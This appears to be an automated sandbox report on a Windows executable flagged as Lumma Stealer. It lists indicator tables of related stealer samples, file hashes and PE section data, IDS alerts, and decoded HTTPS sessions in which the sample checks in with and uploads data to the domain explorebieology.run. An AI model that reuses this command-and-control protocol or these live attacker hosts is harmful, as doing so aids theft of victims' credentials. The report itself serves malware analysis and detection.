|---|---|---|---|---|
| explorebieology.run | JqGBbm7.exe | malicious | LummaC Stealer | 104.21.31.208 |
| explorebieology.run | GMOgZgNpNu.exe | malicious | Amadey, LummaC Stealer | 172.67.179.246 |
| explorebieology.run | xIwQcY1fc4.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | 104.21.31.208 |
| explorebieology.run | S6uUdOHRxv.exe | malicious | LummaC Stealer | 104.21.31.208 |
| explorebieology.run | R3tmayKLpF.exe | malicious | LummaC Stealer | 104.21.31.208 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| CLOUDFLARENETUS | JqGBbm7.exe | malicious | LummaC Stealer | 104.21.31.208 |
| CLOUDFLARENETUS | MCxU5Fj.exe | malicious | LummaC Stealer, PureLog Stealer | 188.114.97.3 |
| CLOUDFLARENETUS | https://variotok.com | malicious | HTMLPhisher | 104.18.95.41 |
| CLOUDFLARENETUS | virut' in file 'Setup.exe', during attempted open by 'explorer.exe' | malicious | Unknown | 104.18.26.149 |
| CLOUDFLARENETUS | GMOgZgNpNu.exe | malicious | Amadey, LummaC Stealer | 172.67.179.246 |
| CLOUDFLARENETUS | xIwQcY1fc4.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | 104.21.31.208 |
| CLOUDFLARENETUS | Payment copy-8899.exe | malicious | FormBook | 172.67.148.163 |
| CLOUDFLARENETUS | https://040030025.blob.core.windows.net/factura/index.html | malicious | Phisher | 1.1.1.1 |
| CLOUDFLARENETUS | MARCH SHIPMENT PLAN DOCS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1 |
| CLOUDFLARENETUS | DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | 104.21.96.1 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| a0e9f5d64349fb13191bc781f81f42e1 | JqGBbm7.exe | malicious | LummaC Stealer | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | MCxU5Fj.exe | malicious | LummaC Stealer, PureLog Stealer | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | GMOgZgNpNu.exe | malicious | Amadey, LummaC Stealer | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | xIwQcY1fc4.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | transferencia HSBC.xla.xlsx | malicious | Unknown | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | Order Confirmation.xls | malicious | Unknown | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | transferencia HSBC.xla.xlsx | malicious | Unknown | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | d5Wai5fIAK.exe | malicious | Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | VER_3316ARUGVHQMejzy7451UUFA.vbs | malicious | Unknown | 104.21.31.208 |
| a0e9f5d64349fb13191bc781f81f42e1 | S6uUdOHRxv.exe | malicious | LummaC Stealer | 104.21.31.208 |
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.600939632856598
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:random(3).exe
                        File size:3'042'304 bytes
                        MD5:8d0cbd77e8d4828aa0df4bb88339f6ac
                        SHA1:bf2ba197991b59779d1215188ff56deb9b151751
                        SHA256:665aee3342bfb1b567acb0d3a130b55bd9dac6ffa01e669f410c3d6c47440b38
                        SHA512:d2c440eea1c30e06bdd8f624407733aeacec0bc53ba5690ab14d565f66e017ae84f6857984db787ad1c744b6e3798742209f6357729819fea3ef8472964bee4f
                        SSDEEP:49152:9igo3N6nPH/J+kDSm8NCpG1nZO/eqEBPvtW5f/1L2:9sN6nPH/J+kf8NC4nM/YPvtWpR2
                        TLSH:D7E53A92750A72CFD44F16B4857FCD8698BD8AB9472049D3AC2CF0BA6D63CC351B6C68
                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g..............................1...........@...........................1......./...@.................................W ..k..
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x719000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x67C0C953 [Thu Feb 27 20:21:39 2025 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F998560B9DAh
                        cmovp ebp, dword ptr [esi]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [edx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add bh, bh
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x62057 | 0x6b | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x621f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x60000 | 0x2e400 | b666f9b1d72d77d73c3e05f64d38e283 | False | 0.9981049408783784 | OpenPGP Public Key | 7.980403044384576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x61000 | 0x1ac | 0x200 | a6c0b70bf165f6b9e4d36c747e8a40f1 | False | 0.54296875 | data | 5.257512990547039 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x62000 | 0x1000 | 0x200 | abe4e884b58240d1cb9001d893d0bcb2 | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| bxbbqwne | 0x63000 | 0x2b5000 | 0x2b4e00 | 271ef5621b2ec5fa3950b5e6cd6dbb52 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| wovautmq | 0x318000 | 0x1000 | 0x400 | b8916dbfdf6f7da5660095167cb81d78 | False | 0.8125 | data | 6.3254208358648665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x319000 | 0x3000 | 0x2200 | ab524de27716f2095dd9d48376aaf59f | False | 0.07341452205882353 | DOS executable (COM) | 0.7503337733344204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x61058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-03-05T09:16:48.550726+0100 | 2060538 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) | 1 | 192.168.2.4 | 56647 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:48.563335+0100 | 2060536 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) | 1 | 192.168.2.4 | 56173 | 1.1.1.1 | 53 | UDP |
| 2025-03-05T09:16:49.071576+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.071576+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.253351+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.253351+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.825660+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.825660+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:49.961907+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:51.093749+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:51.093749+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:51.795991+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:51.795991+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:51.907434+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:52.438897+0100 | 2060537 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:52.438897+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP |
| 2025-03-05T09:16:56.996140+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49735 | 104.21.31.208 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 5, 2025 09:16:48.550725937 CET | 56647 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 5, 2025 09:16:48.559578896 CET | 53 | 56647 | 1.1.1.1 | 192.168.2.4 |
| Mar 5, 2025 09:16:48.563334942 CET | 56173 | 53 | 192.168.2.4 | 1.1.1.1 |
| Mar 5, 2025 09:16:48.582007885 CET | 53 | 56173 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Mar 5, 2025 09:16:48.550725937 CET | 192.168.2.4 | 1.1.1.1 | 0x4d66 | Standard query (0) | gadgethgfub.icu | A (IP address) | IN (0x0001) | false |
| Mar 5, 2025 09:16:48.563334942 CET | 192.168.2.4 | 1.1.1.1 | 0xacb0 | Standard query (0) | explorebieology.run | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Mar 5, 2025 09:16:48.559578896 CET | 1.1.1.1 | 192.168.2.4 | 0x4d66 | Name error (3) | gadgethgfub.icu | none | none | A (IP address) | IN (0x0001) | false |
| Mar 5, 2025 09:16:48.582007885 CET | 1.1.1.1 | 192.168.2.4 | 0xacb0 | No error (0) | explorebieology.run | | 104.21.31.208 | A (IP address) | IN (0x0001) | false |
| Mar 5, 2025 09:16:48.582007885 CET | 1.1.1.1 | 192.168.2.4 | 0xacb0 | No error (0) | explorebieology.run | | 172.67.179.246 | A (IP address) | IN (0x0001) | false |
                        • explorebieology.run
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49731 | 104.21.31.208 | 443 | 7468 | C:\Users\user\Desktop\random(3).exe |

Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:16:49 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: explorebieology.run
2025-03-05 08:16:49 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-03-05 08:16:49 UTC | 200 | IN | HTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        CF-RAY: 91b82c637e5b4340-EWR
                        2025-03-05 08:16:49 UTC1169INData Raw: 31 31 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                        Data Ascii: 1176<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:49 UTC1369INData Raw: 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66
                        Data Ascii: d><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf
                        2025-03-05 08:16:49 UTC1369INData Raw: 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                        Data Ascii: 0.1.1-/api"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p>
                        2025-03-05 08:16:49 UTC571INData Raw: 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69
                        Data Ascii: >(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-i
                        2025-03-05 08:16:49 UTC | 5 | IN
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.4 | 49732 | 104.21.31.208 | 443 | 7468 | C:\Users\user\Desktop\random(3).exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-03-05 08:16:49 UTC | 364 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 55
                        Host: explorebieology.run
                        2025-03-05 08:16:49 UTC | 55 | OUT
                        Data Ascii: act=receive_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=
                        2025-03-05 08:16:49 UTC | 564 | IN | HTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQfy1LdxvUTyiUbDp2E9z0V9d31ShChakR%2F1Le9oK0po3aR7NOJyAkXtXDWQoI9iv2k%2FPcLvKRp%2FFzCucfDMQUIP%2Bosw4tXskrnDP%2BPX4ANQRZ%2FFRrHZVhmO5N8oRdU%2FDQ1nOCBm"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c67e9574b06-EWR
                        2025-03-05 08:16:49 UTC | 805 | IN
                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:49 UTC | 1369 | IN
                        Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
                        2025-03-05 08:16:49 UTC | 1369 | IN
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
                        2025-03-05 08:16:49 UTC | 1013 | IN
                        Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                        2025-03-05 08:16:49 UTC | 5 | IN
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | 7468 | C:\Users\user\Desktop\random(3).exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-03-05 08:16:51 UTC | 381 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=R8O1JPR0WPW2Q00M2I
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 2603
                        Host: explorebieology.run
                        2025-03-05 08:16:51 UTC | 2603 | OUT
                        Data Ascii: --R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="act"send_message--R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--R8O1JPR0WPW2Q00M2IContent-Disposition: form-data; name="pid"1--R8O1JPR0WP
                        2025-03-05 08:16:51 UTC | 562 | IN | HTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0trmLZJ6HKorLNrdY1BcLIZ%2FtlS%2F%2Fqb5xOZaWhxCCGkwF8UB4p3zcJ8tm0%2FXhR9qTPX5QriTTU6t0%2F73OWiuMuuE0p5qbtOUoOGMC7WeJTy06jbPOkeF%2FPcIL1nQXh4ES2j56eQd"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c6fab2bb2c0-EWR
                        2025-03-05 08:16:51 UTC | 807 | IN
                        Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                        2025-03-05 08:16:51 UTC | 1369 | IN
                        Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
                        2025-03-05 08:16:51 UTC | 1369 | IN
                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                        2025-03-05 08:16:51 UTC | 1011 | IN
                        Data Ascii: class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>P
                        2025-03-05 08:16:51 UTC | 5 | IN
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | 7468 | C:\Users\user\Desktop\random(3).exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-03-05 08:16:51 UTC | 380 | OUT | POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=OK0048YRWNYO4Q3GT
                        Cookie: __cf_mw_byp=btftl_ryNDDPEjPOe8h.lFWa37zBj0raEj9lH67Dfn0-1741162609.1950147-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 1090
                        Host: explorebieology.run
                        2025-03-05 08:16:51 UTC | 1090 | OUT
                        Data Ascii: --OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="act"send_message--OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="lid"1vJIvk--mix-labs-20k--OK0048YRWNYO4Q3GTContent-Disposition: form-data; name="pid"1--OK0048YRWNYO4
                        2025-03-05 08:16:51 UTC | 556 | IN | HTTP/1.1 403 Forbidden
                        Date: Wed, 05 Mar 2025 08:16:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BiPaux6v1b0HNb3qxYmezt31JHTj2qTdQCHn0pN%2FPJjdTU83j7PioS%2F4SX864GXakme67138nOwjn0BuVMu3RwTjVaEfruJ7zpZQl30fUZ4Hme2Zq5OVLLDItUtT8riwY3809Z%2F6"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 91b82c741ac37a99-EWR
                        2025-03-05 08:16:51 UTC | 813 | IN
